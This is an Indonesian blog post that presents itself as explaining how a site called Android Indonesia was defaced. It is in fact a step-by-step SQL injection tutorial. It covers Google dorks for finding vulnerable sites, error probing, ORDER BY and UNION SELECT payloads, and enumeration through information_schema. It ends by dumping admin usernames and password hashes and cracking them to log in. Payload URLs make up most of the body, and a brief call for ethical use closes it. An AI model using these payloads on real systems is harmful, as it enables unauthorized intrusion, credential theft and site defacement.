Home Deface SQL Injection

SQL Injection

Diterbitkan
Tags

Sudah cukup lama saya tidak menulis blog, kangen rasanya. dikarenakan sibuk dengan tugas - tugas kuliah yang menumpuk, dan juga banyak yang harus dikerjakan di dunia nyata. Oke tadi siang atau sore saya ada seseorang teman yang mengirim post ke salah satu group Android yang isinya yaitu bahwa site : Android Indonesia Di deface. sebagai pengguna Android sebenarnya saya juga merasakan sakit akibat kelakuan sang penjahat dunia maya tersebut. setelah berjam - jam saya mencari informasi tentang penjahat tersebut. ternyata oh ternyata, cara hacking yang dia lakukan pernah saya praktekkan di situs lokal milik teman saya karena dia membangun sistem dan saya kebetulan ingin testing keamanan yang ada di sistemnya tersebut.
Disini saya akan memberitahu bagaimana sang penjahat tersebut melakukan hacking terhadap situs Android Indonesia. katanya sang hacker tersebut dia melakukannya dengan metode ini. saya mendaftar disalah satu komunitasnya dan membaca pesan dari sang hacker tersebut. Dia menggunakan Teknik yaitu SQL Injection. apa itu SQL Injection ? SQL Injection adalah aksi hacking yang dilakukan oleh Client dengan memodifikasi perintah yang ada di memory aplikasi client  dan juga teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. teknik yang perlu diketahui dalam SQL Injection yaitu :
Karakter : ' atau -
Comments : /* atau --
Information_Schema untuk versi : MySQL 5.x . tidak berlaku untuk versi MySQL 4.x

Tahapan Untuk Melakukan Hacking Menggunakan SQL Injection :
Pertama kita mencari target , dapat menggunakan fasilitas Google Dork. Google Dork adalah fasilitas yang disediakan oleh Google untuk mempermudah pencarian.

Contoh Pemanfaatan Google Dork :
  • Innurl:index.php?id=
  • Innurl:games.php?id=
  • Innurl:categories.php?id=
  • Innurl:article.php?id=
Setelah mendapatkan target anda dapat melakukan tahapan - tahapan seperti dibawah ini misal target kita yaitu :
http://contoh.com/artikel.php?id=43

Tambahkan karakter ' atau - di ujung url menjadi seperti dibawah ini , untuk melihat apakah ada pesan error pada web target kita menjadi seperti ini :
  • http://contoh.com/artikel.php?id=43'
  • http://contoh.com/artikel.php?id=-43
Jika pada web target ada pesan error maka web tersebut kemungkinan besar bisa kita hack, tetapi jika tidak maka anda mencari target yang lain. kira - kira pesan error nya seperti ini :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Jika pesan hampir sama seperti diatas maka kita dapat melakukan tahapan berikutnya yaitu mencari dan menghitu jumlah database yang itu menggunakan metode Order By

Contoh :
  • http://contoh.com/artikel.php?id=-43+order+by+1-- atau
  • http://contoh.com/artikel.php?id=-43+order+by+1/*
Ceklah secara satu persatu hingga menemukan pesan error :
  • http://contoh.com/artikel.php?id=-43+order+by+1--
  • http://contoh.com/artikel.php?id=-43+order+by+2--
  • http://contoh.com/artikel.php?id=-43+order+by+3--
  • http://contoh.com/artikel.php?id=-43+order+by+4--
Jika pesan error tampil ketika anda di posisi order by 7 seperti ini :
  • http://contoh.com/artikel.php?id=-43+order+by+7--
Berarti jumlah tabel yang ada di database ada 6. sehingga anda dapat melakukan tahapan selanjutnya yaitu mengetahui angka berapa yang muncul dengan menggunakan metode Union .

  • http://contoh.com/artikel.php?id=-43+union+select+1,2,3,4,5,6--
Jika muncul angka 5 , gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi

misal: http://contoh.com/artikel.php?id=-43+union+select+1,2,3,4,@@version,6--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

http://contoh.com/artikel.php?id=-43+union+select+1,2,3,4,table_name,6+from+information_schema.tables--
seumpama table yang muncul adalah "admin"

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

http://contoh.com/artikel.php?id=-43+union+select+1,2,3,4,group_concat(table_name),6+from+information_schema. ​tables+where+table_schema=database()--

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

http://contoh.com/artikel.php?id=-43+union+select+1,2,3,4,group_concat(column_name),6+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya.

website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

http://contoh.com/artikel.php?id=-43+union+select+1,2,3,4,group_concat(column_name),6+from+information_schema ​.columns+where+table_name=0x61646D696E--

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

http://contoh.com/artikel.php?id=-43+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

http://contoh.com/artikel.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6+from+admin--


Setelah semuanya dilakukan maka mencari halaman login admin, dan jika password di enskripsi dengan MD5 anda dapat mencari cara Deskripsi MD5 banyak di omz google..

Karena ini sudah pukul 04:30 , mata saya sudah ga kuat lagi jadi saya tidak fokus menulis ni artikel maaf jika acak - acakan ya.

tapi ada beberapa tips dari saya agar anda mengetahui cara - cara hacking terbaru : yaitu manfaatkan Google : dan ketiklah judul yang berhubungan dengan Hacking dan pada pilihan digoogle pililah opsi waktu yaitu : seminggu terakhir, 24 jam terakhir atau sejam terakhir agar anda dapat mengantisipasi web anda jika ada artikel - artikel terbaru tentang hacking. dan ada satu situs yang selalu Update tentang hacking yang wajib anda kunjungi jika anda pada bagian keamanan yaitu http://www.exploit-db.com/ .

Oke sekian dulu dari saya, gunakan lah ilmu anda dengan jalan kebaikan. nanti saya post juga aplikasi untuk melakukan SQL Injection jadi tidak manual seperti ini yang lebih Ribet.. daaahhh xD~~




 

Artikel Terkait

Donesa Rucci

Next Post
Previous Post

2 comments

avatar
Balas
Unknown delete 23 March 2012 at 02:11

yang ganteng2 dan cantik2, tolong komentar kamu disini Trend Media Sosial 2012 di Indonesia

avatar
Balas
Budi Sudarsono delete 22 May 2012 at 12:43

bagus


EmoticonEmoticon

Subscribe to: Post Comments (Atom)